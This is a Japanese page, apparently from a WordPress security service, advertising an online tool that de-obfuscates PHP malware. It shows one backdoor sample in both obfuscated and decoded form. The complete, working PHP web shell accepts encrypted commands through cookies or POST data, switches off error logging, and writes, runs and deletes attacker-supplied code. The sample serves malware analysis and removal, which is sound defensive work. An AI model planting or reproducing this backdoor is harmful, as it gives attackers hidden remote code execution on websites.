Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $embsjrirj = "\146"."\151".chr(108)."\145"."\137"."\x70"."\165"."\164".chr(524-429)."\x63".chr(259-148)."\156".chr(116).chr(101)."\x6e".'t'.chr(115); $volgdpk = "\x62".'a'."\163"."\145"."\x36".chr(776-724).'_'.chr(862-762).'e'.'c'.chr(111)."\x64"."\145"; $xljtxx = "\x69".'n'.'i'.chr(95)."\163"."\x65"."\164"; $vmolhgtq = chr(117)."\156".'l'.chr(945-840).chr(110).chr(107); @$xljtxx("\x65".'r'."\x72".'o'.chr(114).chr(347-252)."\x6c"."\x6f".'g', NULL); @$xljtxx(chr(108).'o'."\x67"."\137".chr(101).'r'."\x72"."\x6f".chr(114).'s', 0); @$xljtxx(chr(884-775)."\x61".'x'."\137".chr(101)."\x78".'e'.chr(466-367).'u'.'t'.'i'."\x6f"."\x6e"."\137"."\x74"."\x69"."\155"."\x65", 0); @set_time_limit(0); function ycssfti($wtqzsnk, $eijegdzoak) { $zpoloepgv = ""; for ($vkpcqvgjky = 0; $vkpcqvgjky < strlen($wtqzsnk);) { for ($j = 0; $j < strlen($eijegdzoak) && $vkpcqvgjky < strlen($wtqzsnk); $j++, $vkpcqvgjky++) { $zpoloepgv .= chr(ord($wtqzsnk[$vkpcqvgjky]) ^ ord($eijegdzoak[$j])); } } return $zpoloepgv; } $umhfny = array_merge($_COOKIE, $_POST); $qgijtneiep = '8ce9e583-5756-4755-841a-0af5fb31c3c7'; foreach ($umhfny as $wnkdjr => $wtqzsnk) { $wtqzsnk = @unserialize(ycssfti(ycssfti($volgdpk($wtqzsnk), $qgijtneiep), $wnkdjr)); if (isset($wtqzsnk[chr(938-841).'k'])) { if ($wtqzsnk["\x61"] == chr(105)) { $vkpcqvgjky = array( chr(112)."\x76" => @phpversion(), chr(854-739)."\x76" => "3.5", ); echo @serialize($vkpcqvgjky); } elseif ($wtqzsnk["\x61"] == chr(101)) { $btxynzwrr = "./" . md5($qgijtneiep) . "\56"."\x69"."\156".chr(99); @$embsjrirj($btxynzwrr, "<" . "\x3f"."\160"."\150".chr(112)."\x20".chr(860-796).chr(490-373).'n'.chr(108)."\x69".chr(914-804).chr(107).chr(774-734)."\x5f".chr(963-868)."\106".chr(722-649)."\x4c".chr(275-206).'_'."\x5f".')'.chr(59).chr(238-206) . $wtqzsnk[chr(485-385)]); @include($btxynzwrr); @$vmolhgtq($btxynzwrr); } exit(); } }
<?php $embsjrirj = "file_put_contents"; $volgdpk = "base64_decode"; $xljtxx = "ini_set"; $vmolhgtq = "unlink"; @ini_set("error_log", NULL); @ini_set("log_errors", 0); @ini_set("max_execution_time", 0); @set_time_limit(0); function ycssfti($wtqzsnk, $eijegdzoak) { $zpoloepgv = ""; for ($vkpcqvgjky = 0; $vkpcqvgjky < strlen($wtqzsnk);) { for ($j = 0; $j < strlen($eijegdzoak) && $vkpcqvgjky < strlen($wtqzsnk); $j++, $vkpcqvgjky++) { $zpoloepgv .= chr(ord($wtqzsnk[$vkpcqvgjky]) ^ ord($eijegdzoak[$j])); } } return $zpoloepgv; } $umhfny = array_merge($_COOKIE, $_POST); $qgijtneiep = '8ce9e583-5756-4755-841a-0af5fb31c3c7'; foreach ($umhfny as $wnkdjr => $wtqzsnk) { $wtqzsnk = @unserialize(ycssfti(ycssfti($volgdpk($wtqzsnk), $qgijtneiep), $wnkdjr)); if (isset($wtqzsnk["ak"])) { if ($wtqzsnk["a"] == "i") { $vkpcqvgjky = array("pv" => @phpversion(), "sv" => "3.5"); echo @serialize($vkpcqvgjky); } elseif ($wtqzsnk["a"] == "e") { $btxynzwrr = "./" . md5($qgijtneiep) . "." . "i" . "n" . "c"; @$embsjrirj($btxynzwrr, "<?php @unlink(__FILE__); " . $wtqzsnk["d"]); @(include $btxynzwrr); @$vmolhgtq($btxynzwrr); } exit; } }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.